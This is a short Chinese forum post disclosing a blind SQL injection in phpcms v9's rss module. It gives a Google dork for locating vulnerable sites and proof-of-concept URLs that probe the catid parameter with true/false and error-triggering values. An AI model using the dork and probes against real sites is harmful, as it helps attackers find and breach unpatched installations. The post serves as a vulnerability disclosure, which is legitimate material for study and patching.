女人是公主 發表於 2011-3-11 11:59:15

phpcms V9 BLind SQL 注入漏洞0day

<p>  影响版本:phpcms v9 blind</p>
<p>  官方网站:http://www.phpcms.cn</p>
<p>  漏洞类型:SQL注入</p>
<p>  漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。</p>
<p>  google dork:inurl:&quot;index.php?m=content+c=rss+catid=10&quot;</p>
<p>  exploit &amp; p0c</p>
<p>  [!] index.php?m=content&amp;c=rss&amp;catid=</p>
<p>  Example p0c</p>
<p>  [!] http://host/index.php?m=content&amp;c=rss&amp;catid=10 &lt;= True</p>
<p>  [!] http://host/index.php?m=content&amp;c=rss&amp;catid=-10 &lt;= False</p>
<p>  [+] http://host/index.php?m=content&amp;c=rss&amp;catid=5 &lt;= show MySQL Error (table)</p>
<p>&nbsp;</p>
頁: [1]
查看完整版本: phpcms V9 BLind SQL 注入漏洞0day